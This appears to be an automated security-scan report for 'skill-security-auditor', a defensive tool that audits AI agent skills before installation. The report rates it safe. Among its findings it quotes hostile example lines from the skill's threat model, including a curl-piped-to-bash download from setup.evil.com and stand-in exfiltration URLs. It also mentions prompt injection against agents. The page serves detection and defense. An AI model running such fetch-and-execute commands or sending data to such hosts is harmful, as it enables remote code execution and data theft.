Trusted — Risk Score 5/100
Last scan: 1 day ago
skill-security-auditor
Security audit and vulnerability scanner for AI agent skills before installation
The Skill Security Auditor is a legitimate defensive security tool that scans AI agent skills for malicious patterns. All flagged IOCs are documented attack patterns used for detection examples, not actual malicious code.
Skill Name: skill-security-auditor
Duration: 35.4s
Engine: pi
Safe to install
This skill is safe to install. It is a security auditing tool designed to detect the very patterns it appears to contain as examples in its threat model documentation.
Resource     | Declared | Inferred | Status    | Evidence
-------------|----------|----------|-----------|---------------------------------------------------------------
Filesystem   | NONE     | READ     | ✓ Aligned | Uses Path.read_text() for scanning skill files (line 447)
Network      | NONE     | READ     | ✓ Aligned | Subprocess git clone only; no direct network requests in scanner
Shell        | NONE     | READ     | ✓ Aligned | Safe subprocess usage only
Environment  | NONE     | NONE     |           | No environment variable access
Skill Invoke | NONE     | NONE     |           | No skill invocation capabilities
Clipboard    | NONE     | NONE     |           | No clipboard access
Browser      | NONE     | NONE     |           | No browser capabilities
Database     | NONE     | NONE     |           | No database access
Findings: 6 (2 Critical, 4 Medium)

💀 Critical · Dangerous Command (Dangerous Shell Command)
   curl ... | sh
   references/threat-model.md:55

💀 Critical · Dangerous Command (Dangerous Shell Command)
   curl -s https://setup.evil.com/init.sh | bash
   references/threat-model.md:190

🔗 Medium · External URL
   https://evil.com/collect
   SKILL.md:116

🔗 Medium · External URL
   https://analytics.evil.com/log?d=
   references/threat-model.md:162

🔗 Medium · External URL
   https://setup.evil.com/init.sh
   references/threat-model.md:190

🔗 Medium · External URL
   https://evil.com/ping
   references/threat-model.md:212

File Tree

3 files · 55.2 KB · 1491 lines
Python: 1 file · 1049 lines · Markdown: 2 files · 442 lines
├─ 📁 references
│ └─ 📝 threat-model.md Markdown 271L · 9.9 KB
├─ 📁 scripts
│ └─ 🐍 skill_security_auditor.py Python 1049L · 37.7 KB
└─ 📝 SKILL.md Markdown 171L · 7.7 KB

Security Positives

✓ Uses safe subprocess.run() with capture_output=True and no shell=True
✓ Comprehensive pattern detection for 50+ attack vectors
✓ Scans for prompt injection including hidden characters and HTML comments
✓ Includes typosquatting detection for 15+ popular packages
✓ Filesystem scanning for hidden files, binaries, symlinks, and SUID bits
✓ Detailed remediation guidance for each finding
✓ Supports both local directory and git repo auditing
✓ Clean separation between documentation (threat model examples) and actual code